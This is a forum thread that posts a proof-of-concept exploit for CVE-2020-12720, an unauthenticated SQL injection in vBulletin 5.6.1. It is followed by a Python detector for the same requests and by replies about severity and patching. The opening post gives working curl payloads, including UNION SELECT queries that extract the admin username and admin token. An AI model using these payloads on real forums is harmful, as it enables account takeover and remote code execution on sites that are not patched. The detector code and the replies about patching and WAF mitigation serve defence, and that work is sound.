vBulletin 5.6.1 Unauthenticated SQL Injection Vulnerability (PoC)

Here is a vBulletin 5.6.1 unauthenticated SQL injection vulnerability (PoC) that was recently patched in vBulletin 5.6.1 Patch Level 1:

Code:
curl "https://website/vb5/ajax/api/content_attach/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi"

Obtain vBulletin 5.6.1 admin user (PoC)

Code:
curl "https://website/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,1 5,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+use r+where+userid=1--"

Obtain vBulletin 5.6.1 admin token (PoC)

Code:
curl "https://website/vb5/ajax/api/content_infraction/getIndexableContent" -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,1 5,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+w here+userid=1--"

Pre-auth SQL injection results in privilege escalation and remote code execution as admin.

This SQL injection vulnerability was reported as CVE-2020-12720.
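As an added example (not part of this thread and not vBulletin's own code), a request-level check of the kind a WAF rule or log-review script would apply to the endpoint shown in the PoC above: any request to /ajax/api/content_*/getIndexableContent whose nodeId[nodeid] is not a plain integer is flagged, and the classic UNION SELECT / comment markers promote it to an injection verdict. The sample requests are constructed, and the premise that a legitimate nodeid is always numeric is an assumption stated in the comments.

```python
import re
from urllib.parse import parse_qs

# Endpoint shape taken from the PoC in this thread:
#   /ajax/api/content_<type>/getIndexableContent
VULN_ENDPOINT = re.compile(r"/ajax/api/content_[a-z_]+/getIndexableContent$")

# Assumption: a legitimate nodeId[nodeid] is always a plain integer node id.
NUMERIC_ID = re.compile(r"^\d+$")

# Markers that distinguish an injection attempt from a merely malformed id.
SQLI_MARKERS = re.compile(r"(union\s+select|--|/\*)", re.IGNORECASE)


def classify_request(path, body):
    """Classify one POST as (verdict, reason); verdict is 'allow', 'alert' or 'block'."""
    if not VULN_ENDPOINT.search(path):
        return ("allow", "not the getIndexableContent endpoint")
    # parse_qs percent-decodes both names and values, so nodeId%5Bnodeid%5D
    # and nodeId[nodeid] land under the same key and '+' becomes a space.
    params = parse_qs(body, keep_blank_values=True)
    values = params.get("nodeId[nodeid]", [])
    if not values:
        return ("alert", "getIndexableContent called without nodeId[nodeid]")
    for value in values:
        if NUMERIC_ID.match(value):
            continue
        if SQLI_MARKERS.search(value):
            return ("block", "SQL injection pattern in nodeId[nodeid]: %r" % value[:40])
        return ("block", "non-numeric nodeId[nodeid]: %r" % value[:40])
    return ("allow", "numeric nodeId[nodeid]")


# Constructed sample requests (path, urlencoded body) for a dry run.
SAMPLE_REQUESTS = [
    ("/vb5/ajax/api/content_attach/getIndexableContent", "nodeId[nodeid]=42"),
    ("/vb5/ajax/api/content_infraction/getIndexableContent",
     "nodeId%5Bnodeid%5D=1+UNION+SELECT+1,2,3+from+user+where+userid=1--"),
    ("/vb5/ajax/api/content_text/getIndexableContent", "nodeId[nodeid]=1%27"),
    ("/vb5/ajax/api/content_text/getIndexableContent", "foo=bar"),
    ("/vb5/forum/general", "page=2"),
]


def scan(requests=SAMPLE_REQUESTS):
    """Return the verdict for each request, in order."""
    return [classify_request(path, body)[0] for path, body in requests]


if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        verdict, reason = classify_request(path, body)
        print(verdict, path, reason)
```

The check blocks on shape (non-numeric id) rather than only on signatures, so an encoded or obfuscated payload is still caught as long as the id is not a bare integer.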

#2
Wow. This SQLi is definitely a critical vulnerability!



#3
If any website runs vBulletin, they will want to patch ASAP. This vuln is severe enough that any attacker, whether leveraging automated scanners or manual attacks, can quickly exploit an outdated vB forum and own it instantly.



#4
It's just a matter of time before an attacker writes an MSF exploit module.



#5
Rest assured that we had already updated to 5.6.1 Patch Level 1 last week when it was released.



#6
A good WAF should already be able to detect and mitigate this vulnerability.
